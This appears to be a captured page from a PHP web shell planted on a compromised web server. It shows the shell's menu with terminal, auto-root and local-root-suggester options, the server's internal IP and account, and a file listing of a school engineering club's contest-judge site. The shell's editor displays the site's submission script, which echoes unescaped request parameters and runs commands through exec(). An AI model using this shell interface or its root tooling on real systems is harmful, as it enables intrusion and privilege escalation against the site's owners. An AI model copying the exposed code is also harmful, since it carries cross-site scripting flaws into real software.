Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.217.105
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
kougakubu /
htdocs /
Delete
Unzip
Name
Size
Permission
Date
Action
.vscode
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
.well-known
[ DIR ]
drwxrwxr-x
2024-08-29 11:22
DirectEdit-master
[ DIR ]
drwxrwxr-x
2024-08-29 23:14
admin
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
answer
[ DIR ]
drwxr-xr-x
2024-08-28 22:37
api
[ DIR ]
drwxrwxr-x
2025-04-07 13:23
article
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
auth
[ DIR ]
drwxr-xr-x
2024-08-28 00:03
discord
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
discord-bot
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
example
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
img
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
judge
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
problems
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
programming_practice
[ DIR ]
drwxrwxrwx
2026-06-18 21:35
s2
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
submit
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
testimonial
[ DIR ]
drwxr-xr-x
2024-08-27 23:20
MathJax.js
62.04
KB
-rwxr-xr-x
2024-08-27 23:20
answer.html
4.06
KB
-rwxr-xr-x
2024-08-28 00:23
answer.php
4.47
KB
-rwxr-xr-x
2024-08-28 22:38
code.css
475
B
-rwxr-xr-x
2024-08-27 23:20
css.css
2.75
KB
-rwxr-xr-x
2024-08-27 23:20
database.py
4.16
KB
-rwxr-xr-x
2024-08-27 23:20
database2.py
731
B
-rwxr-xr-x
2024-08-27 23:20
default.html
3.3
KB
-rwxr-xr-x
2024-08-28 00:23
default.php
3.82
KB
-rwxr-xr-x
2024-08-28 00:23
detail.php
5.75
KB
-rwxr-xr-x
2024-08-28 00:23
detail2.php
5.79
KB
-rwxr-xr-x
2024-08-28 00:23
fuck.txt
488.29
KB
-rw-r--r--
2024-08-27 23:20
icon.jpg
285.53
KB
-rwxr-xr-x
2024-08-27 23:20
icon.png
285.53
KB
-rwxr-xr-x
2024-08-27 23:20
index.php
9.17
KB
-rwxr-xr-x
2024-08-28 00:22
index2.html
5.91
KB
-rwxr-xr-x
2024-08-28 00:23
judge.php
3.8
KB
-rwxr-xr-x
2024-08-28 00:23
judge.php.save
3.74
KB
-rwxr-xr-x
2024-08-28 00:23
judge.py
4.76
KB
-rwxr-xr-x
2024-08-27 23:20
output.html
1.16
KB
-rwxr-xr-x
2024-08-27 23:20
prism.css
6.22
KB
-rwxr-xr-x
2024-08-27 23:20
prism.js
49.16
KB
-rwxr-xr-x
2024-08-27 23:20
problems.html
4.56
KB
-rwxr-xr-x
2024-08-28 00:23
problems.php
5.6
KB
-rwxr-xr-x
2024-08-28 00:23
rank.php
3.93
KB
-rwxr-xr-x
2024-08-28 00:23
submit.html
4.35
KB
-rwxr-xr-x
2024-08-28 00:23
submit2.php
5.03
KB
-rwxr-xr-x
2024-08-27 23:20
t.php
3.22
KB
-rw-r--r--
2024-08-27 23:20
test-1.php
1.29
KB
-rwxr-xr-x
2024-08-29 23:28
test.php
171
B
-rwxr-xr-x
2024-08-28 00:19
test2.html
445
B
-rwxr-xr-x
2024-08-27 23:20
testimonial.php
4.34
KB
-rwxr-xr-x
2024-08-28 00:23
testimonial_gene.php
18.02
KB
-rwxr-xr-x
2024-08-29 23:28
typescript
2.09
KB
-rwxr-xr-x
2024-08-27 23:20
Save
Rename
<?php $session_datas = ['token' => $_GET['session_id'],'id' => $_GET['id'],'name' => $_GET['name'],'loggedin' => $_GET['loggedin']]; $token=$session_datas['token'];$id=$session_datas['id'];$name=$session_datas['name'];$loggedin=$session_datas['loggedin']; $str="?session_id=".$token."&id=".$id."&name=".$name."&loggedin=".$loggedin; ?> <!-- おっきなお友達のみんなえ お前らが打ち込んでいる虚無には 何の意味があるの? ねぇ 教えてよ ぼく ぜんぜぇーんわからないんだ!--> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>秋祭 | 工学部</title> <link rel="icon" type="image/png" href="/icon.png"> <link rel="stylesheet" type="text/css" href="../../css.css"> <link rel= "stylesheet" href="../../prism.css"> <script src="../../prism.js"></script> </head> <?php $submit_succeed = true; $submittion_id = file_get_contents("./submit/number.txt"); $fp = fopen("./submit/number.txt","w"); fputs($fp, (string)((int)$submittion_id+1)); fclose($fp); mkdir("./submit/".$submittion_id); $problem=$_POST["problems"]; $lang=$_POST["lang"]; $source=$_POST["sourceCode"]; if($lang == "python"){ $filename = './submit/'.$submittion_id.'/a.py'; $fp = fopen($filename, 'w'); fputs($fp, $source); fclose($fp); $filename = './submit/'.$submittion_id.'/submit.txt'; $fp = fopen($filename, 'w'); fputs($fp, $problem." ".$submittion_id." ".$lang); fclose($fp); $run_command = "nohup python3 /var/www/html//judge.py < /var/www/html/submit/".$submittion_id."/submit.txt >> /dev/null &"; } else{ $filename = './submit/'.$submittion_id.'/a.cpp'; $fp = fopen($filename, 'w'); fputs($fp, $source); fclose($fp); $filename = './submit/'.$submittion_id.'/submit.txt'; $fp = fopen($filename, 'w'); fputs($fp, $problem." ".$submittion_id." ".$lang); fclose($fp); $run_command = "nohup python3 /var/www/html/judge.py < /var/www/html/submit/".$submittion_id."/submit.txt >> /dev/null &"; } exec($run_command); ?> <body style="background-color: #f9f9f9;"> <header> <img src="../../icon.png" class="gaming" height="35px"> <a> 秋祭 | 静岡高校工学部</a> <nav class="nav"> <ul class="menu-group"> <li class="menu-item"><a href="../../index.php">ホーム</a></li> <li class="menu-item"><a href="../../problems.php">問題</a></li> <li class="menu-item"><a href="/test.php<?php echo $str;?>&url=s2/submit.php">提出</a></li> <li class="menu-item"><a href="../../judge.php">判定</a></li> <li class="menu-item"><a href="/test.php<?php echo $str;?>&url=/s2/Codetest/index.php">コードテスト</a></li> <li class="menu-item"><a href="../../rank.php">順位</a></li> <li class="menu-item"><a href="../../answer.php">解説</a></li> | <?php if($session_datas['loggedin'] !== '1'){ echo '<li class="menu-item"><a href="/auth/login.php">ログイン</a></li>'; } else{ echo '<li class="menu-item"><a href="/auth/logout.php">ログアウト</a></li>'; } ?> | <?php echo $session_datas['name']; ?> </ul> </nav> </header><hr> <br><br> <p class="center" style="font-family:serif;font-size: 40px;text-shadow: #e23b44 2px 2px 3px;">卬高杯</p> <div class="gap"> <a><?php echo "あなたの提出idは".$submittion_id; echo "<br>"; echo "<a href='"."./submit/".$submittion_id."/submit_info.txt'>判定はこちらから</a>"; ?></a><br> </div> <div class="gap"> <a>提出情報: </a> <table border="1px" style="font-family: 'Courier New', Courier, monospace;"> <tr><th>Problem</th><th>Submit ID</th><th>Language</th><th>User Name</th></tr> <tr><td><?php echo $problem?></td><td><?php echo $submittion_id?></td><td><?php echo $lang?></td><td></td></tr> </table><br> <a>Your sorce code:</a><br> <div class="gap"> <a style="font-family: 'Courier New', Courier, monospace;font-size: small;"><?php echo nl2br(htmlspecialchars($source,ENT_HTML5,"UTF-8"));?></a> </div> </div> <br> <footer> <p>© 静岡高校工学部 2023</p> </footer> </body> </html>